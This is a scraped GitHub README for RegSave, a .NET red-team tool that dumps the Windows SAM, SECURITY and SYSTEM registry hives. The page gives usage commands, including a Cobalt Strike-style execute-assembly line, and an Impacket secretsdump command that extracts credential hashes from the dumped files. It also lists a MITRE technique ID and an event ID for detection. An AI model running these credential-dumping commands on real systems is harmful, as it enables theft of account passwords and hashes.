◐ Shell
clean mode source ↗

GitHub - EncodeGroup/RegSave: A .NET implementation to dump SAM / SECURITY / SYSTEM registry hives

Skip to content

Navigation Menu

Sign in

Appearance settings

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up

Appearance settings

Repository files navigation

RegSave

A .NET 3.5 application that will dump SAM / SYSTEM / SECURITY registry keys to a path of your choosing.

Usage

regsave.exe c:\Users\USER\Appdata\Local
execute-assembly /opt/CS/toolkit/regsave.exe c:\Users\USER\Appdata\Local

Collect the files and then parse them with Impacket secretsdump

secretsdump.py -sam samantha.txt -security secundum.txt -system systemless.txt LOCAL

Detection

MITRE 1003.002

Look for Event ID 4656 after configuring audit policy.

More info at Detecting Attempts to steal passwords from the registry

About

A .NET implementation to dump SAM / SECURITY / SYSTEM registry hives

Resources

Readme

Activity

Custom properties

Stars

58 stars

Watchers

3 watching

Forks

12 forks

Languages